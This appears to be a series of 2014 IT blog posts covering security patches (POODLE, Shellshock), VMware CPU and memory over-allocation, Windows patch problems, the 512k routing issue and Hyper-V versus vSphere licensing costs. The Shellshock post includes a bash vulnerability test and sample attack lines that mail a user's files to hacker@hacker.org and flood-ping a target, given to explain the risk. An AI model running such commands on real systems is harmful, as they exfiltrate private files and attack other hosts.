Just When You Thought Your Devices Were Secure…

Last month’s Shell Shock bug had Unix, Linux and Network admins patching their systems against a bash shell vulnerability. This month everyone gets to play along as October adds patches for Microsoft, Adobe, Oracle and a new SSL bug named POODLE.

  • Microsoft October 2014 patches
    Microsoft has issued 3 Critical and 5 Important patches. One of the Critical patches addresses 14 vulnerabilities in Internet Explorer versions 6 through 11, although the bugs are only rated as Moderate in IE 6. As discussed in a previous post Microsoft can’t test every possible configuration. I suggest installing patches on test systems in your own environment before deploying throughout your Windows environment.

  • Adobe Flash Player patches
    Adobe has issued patches for both Cold Fusion (Important) and Flash Player (Critical). The Critical Flash Player patches cover Windows, Mac, Linux, Android and iOS and include patches for both Flash Player and Adobe AIR. Adobe also recommends upgrading to the latest versions in addition to patching, and you’re better off patching and upgrading Flash sooner rather than later. You may also want to consider using a Flash Block/Flash Control plugin or configuring IE to require you to approve sites before you allow them to run Flash Player content.

  • Oracle Critical Patch Update
    The National Vulnerability Database lists 131 CVE vulnerabilities for Oracle in October 2014. Oracle patches also cover their Java, Solaris and MySQL acquisitions and the patches for Java SE on Windows rate up to 10 out of 10 for severity level. The Oracle update page provides an extensive risk matrix for each of the patched applications – use this to evaluate the severity of the vulnerability for your specific applications and then test and patch accordingly.

  • POODLE bug in SSL3.0
    POODLE stands for Padding Oracle On Downgraded Legacy Encryption (CVE-2014-3566) and works by listening in and decrypting less secure SSL 3.0 traffic. Most web servers and clients use the secure TLS protocols for HTTPs connections and will fail back to SSL 3.0 only for legacy applications.. However it is possible for hackers to interfere with a HTTPs session negotiation so that TLS fails and the session fails back to the SSL 3.0 allowing this bug to be exploited. The patch for POODLE is to remove the SSL 3.0 protocol from web servers and clients or to disable failback to SSL 3.0 if you need to maintain legacy applications.  This vulnerability should be addressed for both web servers and web clients as soon as possible but is rated as 4.3 (Medium) and is nowhere near the threat level of either Shell Shock or Heartbleed.

    Microsoft provides instructions on a registry edit to disable SSL 3.0 for IIS web servers and askubuntu.com has information on how to remove SSL 3.0 support for Apache, Nginx and other web servers. Qualys SSL Labs provides an SSL Server test that will evaluate the security of your site for SSL 3.0 and other potential vulnerabilities.

    Qualys also provides a browser test for SSL 3.0 support. Eventually newer browsers will stop supporting SSL 3.0 but until then it can be disabled:

    • Firefox
      Set “security.tls.version.min” to 1 in “about:config” – or use the Disable SSL 3.0 plugin to do it for you.

    • Google Chrome
      You can use the startup flag “–ssl-version-min=tls1” to start Chrome without SSL 3.0 support. Recent versions of Chrome also support the TLS_FALLBACK_SCSV mechanism that prevents failing back to SSL 3.0.

    • Internet Explorer
      In Tools – Internet Options – Advanced – Security, uncheck the boxes for SSL 2.0 and SSL 3.0.

Maximizing VM Performance and CPU Utilization

In a previous post we discussed memory management in VMware and the allocation of memory. Memory over allocation is when you provision your virtual machines with more memory than actually exists on the host machines. Memory over allocation works because the hypervisor assigns memory to virtual machines as needed rather than as provisioned. Do you have a server that needs 2 GB memory for 10 minutes each night and functions at .5 GB for the rest of the day? The hypervisor will run the VM with .5 GB of memory, increase it to 2 GB as needed for 10 minutes, and then reclaim the memory when it hasn’t been used for a while and is needed elsewhere.

The safest scenario is to plan for the case where all VMs are using their maximum memory allocation and only assign existing resources. However this leaves a lot of idle memory on the table that could be used for additional VMs. If you use that idle memory to provision additional VMs the (unlikely) worst case scenario would be if all the VMs spiked memory to 100% at the same time causing the hypervisor to start swapping and leading to severe performance degradation. The additional VMs you could create from memory over allocation aren’t worth the risk for a mission critical VM. However if you need to squeeze in a couple more web servers or virtual desktops then memory over provisioning is useful.

Just as with VM memory, CPU is usually highly underutilized and can be over allocated without compromising performance. As per the Performance Best Practices for VMware vSphere 5.5:

In most environments ESXi allows significant levels of CPU overcommitment (that is, running more vCPUs on a host than the total number of physical processor cores in that host) without impacting virtual machine performance.
(p. 20)

 

Without over allocation the total number of vCPUs is limited to the number of physical CPU cores (pCPU) on a host:

(# Processor Sockets) X (# Cores / Processor)  = # Physical Processors (pCPU)

If the physical processors use hyperthreading:

(# pCPU) X (2 logical processors / physical processor) = # Logical Processors

If you’ve got 2 processors with 6 cores each that would provide 12 pCPUs or 24 pCPUs with hyperthreading enabled. However hyperthreading works by providing a second execution thread to an existing core. When one thread is idle or waiting the other thread can execute instructions. This can increase efficiency if there is enough CPU Idle time to provide for scheduling two threads. However in practice performance increases are up to 30% rather than the 2x CPU suggested by the logical CPU count formula.

In addition to considering the effect of hyperthreading you will also need to consider the type of workloads being run by processors and whether you are using NUMA (Non-Uniform Memory Access) hardware. We’ll delve into the intricacies of tuning vCPUs, workloads, and host hardware in a later post. For now Best Practices for Oversubscription of CPU, Memory and Storage suggests starting with one vCPU per VM and increasing as needed and quotes recommendations for the maximum ratio of vCPUs to pCPU varying from 1.5 to 15.

The Best Practices paper lists several metrics to monitor in order to determine the best vCPU to pCPU ratio for your environment:

VM CPU Utilization: To determine if a VM requires additional vCPU resources.
Host CPU Utilization: To determine overall pCPU utilization.
CPU Ready: Measures the amount of time a VM has to wait for pCPU resources. VMware recommends this should be less than 5%.

Maximum CPU for both Host and VM is typically set at 80% but this value should be adjusted depending on your workload and hardware.

Shell Shock Patch Update

Five additional bash bugs have been discovered since our post about the CVE-2014-6271 Shell Shock bug last week: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187. Vendors have been issuing patches to address vulnerabilities as they were announced and early versions of Shell Shock patches will not cover all the vulnerabilities. ZDNet has a good write up of tests that can be used to determine which vulnerabilities have been patched and which are still open to attacks.

As previously mentioned operating systems and network devices that use bash will need to be patched:

  • Apple: The Register has an update with links to Apple patches.
  • Cisco: A frequently updated Cisco Security Advisory breaks down supported Cisco products into “Under Investigation”, “Vulnerable”, and Confirmed Not Vulnerable”, and provides instructions on how to patch vulnerable products or how to purchase upgrades if you don’t have Cisco support.
  • F5: F5 provides a list of vulnerability assessments by product and version.
  • Oracle: Oracle’s security advisory uses the same Vulnerable/Not Vulnerable/Under Investigation breakdown as Cisco and provides links to available patches. You will need an Oracle account to get the patches.
  • VMware: VMware’s Knowledge Base article 2090740 states that while ESX 4.0 and 4.1 are no longer supported they are potentially vulnerable and VMware will provide patches. The complete list of patches is available at VMSA-2014-0010 and includes patches for VMware virtual appliances. ESXi is not vulnerable as it uses the ash shell instead of bash.

Check with your vendor if they are not in the above list and check for updates frequently.

Are You Vulnerable to the Shell Shock Bug?

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively malware and virus free. Not completely secure but relatively so. One avenue of attack for Linux and other Unix variants is that they have some basic core utilities that were written before internet security was a significant consideration and potential exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As per the explanation from seclists.org the problem is that the bash shell in Unix/Linux allows you to define a variable as a function. However bash continues to process the code past the end of the function definition. The following command contains an example of the flaw that can be used to determine if you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re ok. The part of the command listed above that is a problem is the “echo you are vulnerable” section as it can be configured to run any command. In most cases the Shell Shock bug won’t run with root permissions so it won’t be able to delete system files. However even a minimally privileged user account can mail all a user’s files to a hacker (cd; cat * | mail –s “all my files” hacker@hacker.org ), or set a computer up as a node in a DDOS attack (ping –c 9999999 ddos.target.com), or fill in your own computer security worst nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded into the “internet of everything”, and is the base for Apple systems. The problem isn’t that it’s difficult to patch, the problem is that it is difficult to patch every bash shell with this vulnerability. Given the patch issues Apple has had recently they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact it may be worse because it’s easier to exploit. Heartbleed exploited the possibility of finding confidential information in a random memory dump. Shell Shock can be exploited through CGI scripts in http headers and depends mostly on finding a vulnerable device. Hackers have already created worms to find devices and exploit Shell Shock less than a day after the vulnerability was announced.

In the last post I discussed how it’s a good idea to wait before you apply some patches. For OS patches like the quickly pulled iOS 8.0.1 you’re better off waiting. Security patches should be applied as soon as possible. With a vulnerability like Shell Shock you need to check all your systems, patch them as soon as patches are available and enact a mitigation plan until everything is patched.

Unfortunately final patches may take a while and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.


10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.

Should Automatic Updates Be Enabled On Your Computer?

In the best of all possible worlds every software update would work perfectly and there would be no question about whether you should enable automatic updates. However updates can and have caused significant problems ranging from annoying errors to blue screen crashes, which raises the question of whether automatic updates should be used at all.

When complaining about patch problems Microsoft is an easy and obvious target. They issue patches on a known schedule and have an install base that is diverse enough that it’s impossible for them to test every patch with every software permutation. Software incompatibilities are inevitable and problems are widely publicized but Microsoft eventually sorts out the problems and withdraws or reissues patches. In the case of Microsoft patches it is usually best to wait a few days to check for problems in the field before installation.

Patching third party software is just as critical as patching your operating system and these patches can have problems as well. As reported by The Register an update to Symantec’s Norton Internet Security (NIS) via their Live Update just before Labor Day weekend caused browsers to crash, mainly on systems running XP. Since Microsoft no longer provides patches for XP, third party security products (such as NIS) may be used as the primary line of defense for XP users, and the interim advice quoted on Symantec forums of upgrading to Windows 7 or turning off browser protection was not particularly helpful. Eventually a fix was disseminated through Live Update and the problem was purported to have been caused by older hardware rather than XP itself.

One of the significant differences between Microsoft OS patches and third party software patches is that a problem with an OS patch has a greater possibility of causing a system crash, while a third party program patch would be more likely to cause the program being patched to have an issue. Security software updates virus definitions may need to be disseminated quickly, and even with the possibility of software problems you’re better off with the updated definitions.

This prompts the questions – what should be automatically updated? By default most third party software is configured to update automatically. Should you go through each of your programs and reconfigure them to only install patches that you have approved?

The answer is that it depends:

  • Do you have alternate software with the same functionality?
    If you have Chrome, IE, Firefox and Opera, and a bad patch takes out one of them the others are still available to search and download fixes.
  •  

  • Is your operating system configured in some way that may not have been tested when the patch was created?
    Are you running relatively old hardware? Do you have an English language OS with Asian and/or Cyrillic fonts installed? Have you tweaked the settings in your antivirus program? Make sure you’ve backed your system up before applying any patches and that you know how to restore it. As we discussed in a previous post, not every software permutation can be tested and incompatibilities can cause blue screens.
  •  

  • Is your OS officially supported for the software?
    Programs written for XP may work on newer Windows versions but OS updates could break dependencies in legacy software. Keep track of OS updates and check the functionality of legacy software to determine if a patch needs to be rolled back to keep the software working.
  •  

  • Is the software frequently patched? Are critical vulnerabilities being patched?
    Adobe Reader and Adobe Flash Player are both patched frequently and patched for critical vulnerabilities. Java Runtime (JRE) can also be a high vulnerability target on your computer. Adobe products and JRE should be configured for auto updates as should updates for virus definitions.

Keep in mind that the possibility of a patch causing a problem is relatively minor and even a patched system will never be completely safe. There will always be a gap between when newly discovered vulnerabilities start to be exploited and when patches are available for them. The only way to address that gap is by training your users on what they should not be doing on the internet.

512k Day Isn’t the Cloud’s Only Network Problem

August 12th was 512k day – the day when the IPv4 BGP routing table entries reached 512k routes. This matters because there are routers that have a default limit of 512k IPv4 routes, and if these routers haven’t been modified to increase this limit they could crash or fail to load new routes. There are fixes for this problem and not all routers are affected, but even with advanced notice there were still outages and slowdowns when the number of routes passed 512k.

The thing to note about this outage isn’t just that known problems were not addressed, it’s even if your network was configured perfectly, and a remote resource vendor was providing a promised 99.999% uptime, there still could be a service outage from your perspective if there was a problem in the network between you and your provider. This is especially important when considering moving your resources to the cloud. While a cloud based EMR system may provide tremendous benefits at a cost effective rate, a doctor can’t do their job if there is a problem with a hospital’s internet connection and they can’t get test results or medical history.

The 512k limit wasn’t the first network disruption and it will not be the last. As soon as a clever way is developed to manage the internet, an even more clever way will be found to hack it. Basic infrastructure equipment that has been working for years without any issues can become a victim of specifications that are now obsolete. In short, there is no way to guarantee uptime for anything accessed over the internet. Accepting the possibility of downtime is the price you pay for the economies of Cloud computing.

If you can accept the possibility of downtime and Cloud computing is a fit for your company, one main criteria in selecting a Cloud provider should be its availability as seen from your site. Test to verify that you can consistently access the provider with minimal latency during your trial period, and archive the data to create your own availability SLA reports for each prospective vendor. Also collect data on network bandwidth for each provider as well, and extrapolate the data from your test environment up to an estimated usage in a full deployment.

To look at a provider’s performance over a longer term, services such as downdetector.com aggregate user reports of downtime and can provide an archive of previous issues. Downtime from the perspective of previous clients can also provide insight into how a Cloud vendor handles support issues after you’ve implemented their software. Detailed post-mortems of issues are welcome but not the norm. However support through Twitter and updates via Facebook are common and provide a history of previous issues.

Should network outages mean you have to rule out Cloud computing? The possibility of outages is definitely a factor to consider, but how significant those outages are to you will depend on your network, the Cloud provider, and how sensitive you are to losing services.

Windows Patch Problems

The Windows August Update released on 8/12/14 included 4 updates for Windows 7, 8 and 8.1 that were linked to blue screens. Since the release all 4 patches have been pulled back by Microsoft, but if you have Automatic Updates configured on your computer and the patches were applied Microsoft has provided manual instructions on removing the patches (see section on Mitigations). Please note that the removal instructions are done in safe mode – if your computer won’t boot to safe mode you may need to resort to whatever recovery utilities came with your PC.

If you have Automatic Updates configured to download patches and ask before installing, check the list of recommended patches and make sure the following patches are not selected for installation:

  • 2982791  MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
  • 2970228  Update to support the new currency symbol for the Russian ruble in Windows
  • 2975719  August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
  • 2975331  August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

This isn’t the first time patches have been released and then pulled back or needed to be patched themselves:

This is by no means a complete list, but it illustrates that patches intended to make a system perform better and run more securely can have unintended consequences. The problem is not that the patches haven’t been tested before release, but rather that there is no way to test every possible system permutation. For example, the April 2013 issue was caused by a Brazilian third party banking security software, and the most recent patch problem happened if “OpenType Font files are installed in non-standard font directories that are recorded in the registry with fully qualified filenames” .

Does the chance of a crash mean you should disable updates? Of course not – that would be leaving your computer vulnerable to security problems. It does mean that you should disable automatic updates and make sure the updates must be approved before installation. In addition check for reports of issues with updates before installing them and only apply patches intended for your system.

VMware or Hyper-V? Part 3: Virtualization Licensing Costs

In the last post we looked at the cost for licensing Microsoft operating systems on virtual machines – and noted that the licensing costs were the same regardless of the hypervisor used. The cost difference for hypervisors is primarily based on licensing advanced features – so to determine your licensing costs, you need to determine which advanced features are required in your environment.

If you look at the features available in the free hypervisors versions, Hyper-V provides more functionality than ESXi. For example, Live Migration and Failover Clustering are available with Hyper-V, and the corresponding features in VMware – vMotion and VMware HA – are not available until you purchase a VMware “Essentials Plus” license. It is possible that all the virtualization features you require are available in the free version of Hyper-V or VMware. However VMware and Hyper-V implement features differently, and you may find paying for vMotion to be a better fit than free Live Migration. Or that free Failover Clustering works just as well for you as paying for VMware HA. Fortunately, both VMware’s vSphere and Hyper-V’s System Center Virtual Machine Manager (SCVMM) provide trial versions so you can test feature implementation for yourself and decide if free is good enough, or if a licensed feature is worth paying for.

Once you have your trial environments in place, it can still be difficult to compare “advanced” features not only because similar features have different names, but also because functions don’t overlap completely, and it is not possible to do an apples-to-apples comparison. The agnostic hypervisor comparison application at Virtualization Matrix does a very good job of normalizing virtualization features for comparison without biasing the feature descriptions – and it also provides a useful outline of which features are provided by each licensing model.

Hyper-V Licensing

Hyper-V advanced features are available through the Virtual Machine Manager (VMM) component in Microsoft’s System Center (SC). SC uses a Management License model that charges based on the number of processors and managed operating system environments (OSEs). Much like the Windows 2012 Standard and Datacenter Editions described in the previous post, System Center has Standard and Datacenter Management License Editions:

Hyper-V without System Center System Center 2012 R2
Standard Edition
System Center 2012 R2 Datacenter Edition
Cost Free $1323 $3607
Maximum number of processors No processor restrictions 2 physical processors 2 physical processors
OSE Management Licenses No OSE Management licenses required 2 OSE Management licenses Unlimited OSE Management licenses

In addition to the base licensing above how you manage the combination of processor/OSE count in System Center Standard/Datacenter Editions can have a significant influence on your licensing costs. For example, the following comparison shows the cost for System Center to manage 12 OSEs on either 2 or 6 processors, using both Datacenter and Standard licenses:

# Managed OSEs # Physical Processors # Datacenter licenses needed Datacenter License Cost # Standard Licenses needed Standard License Cost
12 2 1 $3607 6 $7938
12 6 3 $10821 6 $7938

 

Datacenter licenses are more cost effective in environments where you are running more than 2 OSEs per physical processor, while Standard licenses become more cost effective at 2 or fewer OSEs per physical processor As a result, Standard licenses can be less expensive if your VMs are assigned multiple virtual processors, while Datacenter licenses will be less expensive for VMs provisioned with fewer processors.

vSphere Licensing

“vSphere” is the name for the overall VMware management environment, including the ESXi hypervisor, the vCenter management server, and any other VMware virtualization components (e.g. vSan storage, or VMware NSX virtual networking).  vSphere licensing is available as Essentials or Essential Plus Kits for small business environments, or Standard, Enterprise and Enterprise Plus Editions for larger environments. The Essentials Plus Kit and Standard Edition provide the bulk of the functionality needed for small business environments (vMotion, High Availability, vSphere Replication, etc.), while higher end performance tuning features like Flash Read Cache are only available at the Enterprise and Enterprise Plus level.

vSphere Essentials Kits have pricing targeting smaller organizations. Essentials Kits include a vCenter license which can be applied up to 3 servers with 2 processors each. The vSphere Standard, Enterprise and Enterprise Plus Edition licenses are per processor, and each processor license requires at least 1 year of initial support and at least 1 vCenter license :

vSphere Edition Cost # Physical Processors Basic Support Production Support
Essentials Kit $495 3 servers / 2 processors each $65 $299/incident
Essentials Plus Kit $4495 3 servers / 2 processors each $944 $1124
Standard (requires vCenter) $995 1 $273 $323
Enterprise (requires vCenter) $2875 1 $604 $719
Enterprise Plus (requires vCenter) $3495 1 $734 $874
vCenter Foundation $1495 N/A $545 $645
vCenter Standard $4995 N/A $1049 $1249

 

Comparing Costs

If Hyper-V without SCVMM provides all the virtualization features you need, and works in your environment, it’s hard to argue with a price of “free”. However, if Hyper-V doesn’t work well when you test it in your environment, or if you need features that aren’t available in the free Hyper-V install, then vSphere licensing costs may well be comparable to System Center Virtual Machine Manager costs.


Previous posts in our VMware or Hyper-V series:

Part 1: Which hypervisor will work best for your environment?
Part 2: VM Operating System Licenses

VMware or Hyper-V? Part 2: VM Operating System Licenses

In our last post we looked at some of the environmental factors that play into a choice between VMware and Hyper-V: required OS support, hardware compatibility, and ease of use. This post and the next will look at what is often the deciding factor in selecting a hypervisor: Cost.

Software costs can be broken down into the cost for advanced hypervisor features and the cost for licensing virtual machine operating systems. The basic ESXi and Hyper-V hypervisors are free, but you will pay for advanced hypervisor functions – and that will be the topic of the next post. In this post, we’ll take a look at the cost of licensing Windows operating systems running on virtual machines.

As of Windows 2012, Microsoft has changed its licensing model for Windows virtual machine operating systems (OSEs) in Standard and Datacenter edition to a processor based model. The previous model was per-server licensing – your agreement included a specified number of licenses or multiple activation keys, and you could install as many operating systems as you had licenses. You can still apply per server licenses for Windows 2012 Essentials Edition to virtual machine OSEs, but Windows Server 2012 Standard and Datacenter Editions now also include licenses specifically for virtual machine OSEs. The three Windows Server 2012 Editions which focus on virtualization are:

Hyper-V Server 2012 Windows Server 2012 Standard Edition Windows Server 2012 Datacenter Edition
Hyper-V installation Console install (command line only – no GUI) Installed as server role in Windows Server 2012 Installed as server role in Windows Server 2012
Cost Free $882 $4809 or $6155, References vary
Maximum number of processors No processor restrictions 2 processors 2 processors
Available licenses for virtual machine operating systems No VM OSE licenses 2 VM OSE licenses Unlimited VM OSE licenses

Please note – prices will vary depending on your licensing agreement and reseller.

Hyper-V Server 2012 is the Windows equivalent of VMware’s ESXi: it is free, and can be used for basic VM management functions. It is a console installation, with just a command prompt as an interface, so management is done either remotely, or through the command line. There are no licenses for virtual machines OSEs provided with Hyper-V Server 2012, so an OSE license will need to be provided for every Windows virtual machine run on Hyper-V Server 2012.

Windows 2012 Standard and Datacenter Edition provide two advantages over the minimal Hyper-V 2012 Server Edition. First, with Hyper-V installed on Standard or Datacenter, you have access to Hyper-V management tools directly on the same server running Hyper-V. Second, both Editions include licenses for virtual machine OSEs: Standard Edition provides licensing for 2 VM OSEs, and Datacenter Edition provides licensing for an unlimited number of VM OSEs.

However, the virtual machine OSE licenses provided by Standard and Datacenter Editions are not restricted to using Hyper-V: they can be used with any hypervisor. Standard and Datacenter licenses are assigned to hardware – specifically they are assigned to processors. It doesn’t matter if the hypervisor running on the processors is Windows 2012′s Hyper-V, or VMware’s ESXi, or Red Hat’s RHEV – the virtual machines managed by the hypervisor can use the licenses provided by Standard or Datacenter Edition.

There are, of course, additional rules as to how Standard and Datacenter Edition licenses can be applied. Microsoft provides a pricing information and FAQ PDF that outlines the basics of Standard and Datacenter Edition licenses:

  • The Standard/Datacenter Edition licenses are processor based and each will apply to 2 processors. If your server has more than 2 processors, you will need to apply enough additional Edition licenses to cover all the processors
  • There is no limit on the number of cores per processor
  • You cannot mix Standard and Datacenter licenses
  • If a virtualization host has multiple Standard Edition licenses, you get 2x VM OSE licenses for each Standard Edition license
  • If a virtual machine moves from one virtualization host to another, the virtual machine OSE license does not move with it – since the OSE licenses for the virtual machines are tied to the processor, the new virtualization server must also have a license for the OSE for that virtual machine. This is not an issue if both virtualization hosts have the unlimited Datacenter Edition licensing for VM OSEs.

Licensing is a spectacularly confusing topic, and you need to carefully read the fine print of your current licensing agreement to determine exactly which and how many Windows operating systems you’re allowed to run as virtual machines. However, the costs will be the same regardless of the hypervisor in use. When comparing overall software costs between Hyper-V and VMware, licensing for advanced virtualization features will be the primary factor – and we will look at that in our next post.


Additional posts in our VMware or Hyper-V series:

Part 1: Which hypervisor will work best for your environment?
Part 3: Virtualization Licensing Costs

VMware or Hyper-V? Part 1: Which hypervisor will work best for your environment?

If you’ve gone through the comparison of Cloud vs Virtualization, and decided that Virtualization is the best fit for you – you’re still not done. The next step is deciding which hypervisor to use for your virtualization. If a significant portion of your environment is Windows, then your primary choices are VMware or Hyper-V.

Comparing VMware and Hyper-V is less of a “which is better” question than a “which would be better for you?”   You can start by looking at a Hypervisor comparison chart, and while that might narrow the differences between the two, it will not rule one out unless you need to run an OS specific to VMware or Hyper-V.

Considerations when choosing between VMware and Hyper-V include:

  1. Which operating systems do your Virtual Machines (VMs) need to run?

    If you’re mostly Windows, with a few Linux installs, either will work for you. If you need to support a wide variety of operating systems on your VMs, VMware has much more breadth – see the Hypervisor comparison chart for more details.

  2.  

  3. Hardware compatibility

    If you’ve already got a significant investment in server hardware, it makes sense to continue to use as much of that hardware as possible for Virtualization hosts. VMware’s Compatibility Guide provides a search that will let you enter your existing server, and tell you which versions of VMware are supported. Got a Dell PowerEdge T110? You should be able to run ESXi 5.5 on it.

    Hyper-V is installed on Windows 2008 or Windows 2012 and it has the same basic installation requirements as the OS. Installing the Hyper-V role does require additional processor support for virtualization. Microsoft also maintains a Windows Server Catalog to identify servers that are compatible with Windows 2012 and Hyper-V.

  4.  

  5. Ease of use

    Hands-on comparison of VMware and Hyper-V are often biased due to the loyalties and experiences of the reviewer. Additionally, updates to management tools and version capabilities change frequently – for example, one major complaint about the free ESXi 5.1 hypervisor was that it was limited to 32 GB memory – as of 5.5, that limitation has been removed. So, keep those factors in mind when you read through the following sample of hypervisor comparisons:

    Hyper-V 2012 versus VMWare vSphere 5
    Real Hyper-V vs. VMware comparison: What you actually get for free
    Setting up your Hacking Playground – VMWare vs HyperV
    Hyper-V R2eality: VMs not so hot after all…
    Additionally, take a look at the instructions for the same task for each of the platforms. For example – implementing High Availability (HA) in VMware vs. configuring HA in Hyper-V .

Most reviewers find it easier to implement complex virtualization features with VMware, and these features tend to work better with VMware – provided you’ve paid for the VMware licenses and you’re running on supported hardware. Hyper-V wins points for a wider range of supported hardware, and the ability to configure advanced features without requiring license fees – but it may not be able to do everything VMware does and is more difficult to configure.

In our next post, we’ll take a look at how costs for VMware and Hyper-V compare – including the free editions of both, and what you get when you pay for the licenses.


Additional posts in our VMware or Hyper-V series:

Part 2: VM Operating System Licenses
Part 3: Virtualization Licensing Costs